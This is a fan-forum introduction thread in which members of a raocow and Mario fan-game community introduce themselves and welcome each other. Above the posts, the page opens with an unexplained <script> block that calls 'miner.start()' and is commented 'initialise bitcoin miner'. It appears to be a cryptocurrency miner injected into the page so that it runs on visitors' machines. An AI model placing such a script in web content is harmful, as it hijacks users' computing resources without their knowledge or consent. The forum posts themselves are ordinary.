<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralsmbx communitymario fan games galaxy

Introduction/Welcome Thread

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
Eclipsed

Re: Introduction/Welcome Thread

Postby Eclipsed » 1 year ago

I am Eclipsed, an smbx speedrunner, and I came to this forums specifically just to beat all of Zyglrox Odyssey's MAGLX records.

I found this thread through this process:

I asked MECHDRAGON if there was any one I didn't know of that spedrun, and he stated Zyglrox Odyssey. I then saw that he spedrun MAGLX and found out it stood for Make a Good Level. I searched this up and tvtropes stated that it was made by talkhaus, so after asking rockythechao's help with the security question, I registered my account.

rena
everyones a stupid hobo
Pronouns: spider

Postby rena » 1 year ago

Ffydwyrr wrote: Hello, everyone. I'm a friend of YelseyKing's and a total RPG enthusiast, although I enjoy the occasional platform game as well. (My favorite Mario-universe games are Yoshi's Island and SMB2, because of their lack of time limits. And Super Mario RPG, of course.)

I'm also an amateur writer, game designer, and occasional musician. I may share my work here in the future.

It's a pleasure to meet you all!

EDIT: Oh, by the way, if you have trouble spelling or pronouncing my name, you can just call me Mister F.
f-san, hajimemashite (。>﹏<。)

patch_rat
Pronouns: she/her

Postby patch_rat » 11 months ago

I forgot my username and accidentally made another account but then I recovered this one.

I recently remembered raocow existed and started watching his All the Megamen videos since I'm a big fan of those games. Then I remembered this place existed! Wahoo!
I love wooooorld

Awoo
I came here to awoo at you!
Pronouns: he/him/his

Postby Awoo » 10 months ago

Hey there everyone, how's it going?

Been a huge fan of raocow's for years, found him through his most famous video ever over half a decade ago, and have been watching him on a semi-regular basis since! Been watching religiously since about this time last year or maybe a little after that, don't actually remember!
Thought I'd actually make an account and maybe interact with other fans of the rao'est of cows!
Exclamation points!
ワンワン :pal:

ano0maly
Discord User

Postby ano0maly » 10 months ago

hi there
Image << Click!

This Eye o' Mine
Pronouns: Nah, I'm good

Postby This Eye o' Mine » 9 months ago

Hey
So, like, this is a forum, right? With words?

Oh man, I'm terrible at these introduction things.

Anyway, been watching raocow since the 12th of April 2013 (remembered the exact video that was up that day), when I was just getting into let's plays. I typed his name into the Youtube search bar knowing that he was an LPer, but I can't remember exactly why I knew that. I think it was either because Proton Jon mentioned his name, or because I kept seeing references to him on TV tropes. Either way, he's really the only LPer that's been a solid, semi-solid mainstay in my Youtube viewing experience since.

Thought about joining the talkhaus a couple of times, but for some reason never did. I tend to be pretty reticent when it comes to stuff like that, I guess because I was kind of worried it would go terribly. I do quite like the creative vibe coming from projects like asmbxt, which I think is what's making me join now. I've been engaged in several creative things, mainly music composition and nature photography, and in the past year I took up programming and... visual art? The painting kind, but with less paint and more drawing tablet (I made my avatar just the other day). Never really kept a steady stream of anything going, though. Maybe that'll change here or not, but either way I need some place to thing...

...yeah this is going on a bit long and I'm starting to run out of my allotted words for the day, so I think I'll just click that submit

dr_vblschrf
may or may not be an actual fox

Postby dr_vblschrf » 9 months ago

Week-late greetings! Good to see another musician in the mix.

Blynken

Postby Blynken » 8 months ago

Hello all,

So, I've watched raocow's videos intermittently for quite a long time, ever since the original ASMT if memory serves. It was actually his work and the general culture surrounding Super Mario World hackers that got me into indie games, the Touhou Project, and other niche interests I still enjoy today.

It's great to see that everything's still going strong around here. I suppose I might be a bit of an amateur programmer, but most of the time I'm too busy with school and stuff to really think about contributing anything. Still love to play wand watch the occasional thing though!

Also talk to me about books I guess?

ShingleBells

Postby ShingleBells » 8 months ago

Hello everyone!

My name (on the internet, at least) is ShingleBells, and I'm new! I got hooked on Raocow's videos when I discovered his let's play of Celeste about a week ago. Hope we can all get along!

Sturg
Gets his freak on with VGM
First name: sturgyman

Postby Sturg » 8 months ago

Heyo you two! Welcome!
ImageImage
ImageImageImageImage

Smibbix
ah yes i see

Postby Smibbix » 7 months ago

Hi. It’s me.

Y’know, from Earth?
I'm already patchouli

n~yoron nyoro~n

Shepsmeister
w
First name: vic
Pronouns: they/he

Postby Shepsmeister » 6 months ago

here's my big comeback: hello

gunpowder_tea

Postby gunpowder_tea » 5 months ago

Hello, I'm gunpowder_tea and I enjoy drawing that anime crap. I've been watching raocow for years (and annoying/amusing loved ones with quotes) but I was just too shy to join talkhaus. Welp, I finally joined.

Awoo
I came here to awoo at you!

Postby Awoo » 5 months ago

Welcome! I hope you enjoy raocow's talking house as much as I have :3
ワンワン :pal:

Ariacor
Pronouns: they/them/their

Postby Ariacor » 4 months ago

Hi everyone, I'm Ariacor. I've been a raocow watcher since like 2012 or 2011 and I used to be a lot more active under the username stopmotioncreator1. Hopefully you've all been doing well!

Banim

Postby Banim » 3 months ago

Henlo. I'm a dude from Spain, I've been watching raocow from time to time since around 2010 or 2011. I think the first video of his I watched was cat planet cat planet cat planet!!!!! and ever since I've stuck around. I enjoy watching the Super Mario World hacks and whatever other games he plays but I'm terrible at them myself so whenever I decide to try something raocow is playing I give up fast :oops:

Anyway, dunno how active I'll be in the forums, I've lurked a bit in the past and I might just continue doing so, who knows!

KobaBeach
VIP QUALITY poasts0 erveyday :)
First name: David

Postby KobaBeach » 1 week ago

game over
return of furry
i'm a 65c816 girl, in a 65c816 world
LDA and STA, it's fanTAXtic

who cares:

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 1 week ago

never in a million years would i have believed i'd get the opportunity to welcome the True Master Of Welcome Wagon

glad to see you back, Koba

KobaBeach
VIP QUALITY poasts0 erveyday :)
First name: David

Postby KobaBeach » 1 week ago

holla holla gamers
i'm a 65c816 girl, in a 65c816 world
LDA and STA, it's fanTAXtic

who cares:

Awoo